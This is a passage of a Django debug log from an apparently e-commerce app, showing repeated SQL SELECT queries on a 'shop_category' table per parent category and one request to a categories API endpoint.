"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:18:23,000 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:18:23,005 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:18:23,010 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:18:23,013 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:18:23,018 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:18:23,024 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:18:23,028 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:18:23,031 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:18:23,035 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:18:23,039 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:18:23,045 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:18:23,049 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:18:23,053 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:18:23,057 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:18:23,061 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:18:23,067 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:18:23,071 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:18:23,075 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:18:23,079 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:18:23,083 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:18:23,087 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:18:23,092 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:18:23,096 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:18:23,101 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:18:23,107 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:18:23,111 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:18:23] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:18:24,858 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:18:24,865 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:18:24,869 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:18:24,871 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:18:24,875 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:18:24,877 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:18:24,880 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:18:24,882 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:18:24,884 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:18:24,888 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:18:24,890 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:18:24,892 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:18:24,894 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:18:24,897 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:18:24,902 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:18:24,905 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:18:24,907 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:18:24,909 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:18:24,912 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:18:24,916 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:18:24,919 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:18:24,921 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:18:24,924 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:18:24,926 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:18:24,929 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:18:24,934 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:18:24,936 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:18:24,939 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:18:24,941 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:18:24,944 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:18:24,948 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:18:24,951 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:18:24,953 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:18:24,955 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:18:24,958 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:18:24,962 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:18:24,964 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:18:24,967 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:18:24,969 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:18:24,972 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:18:24,974 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:18:24,977 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", 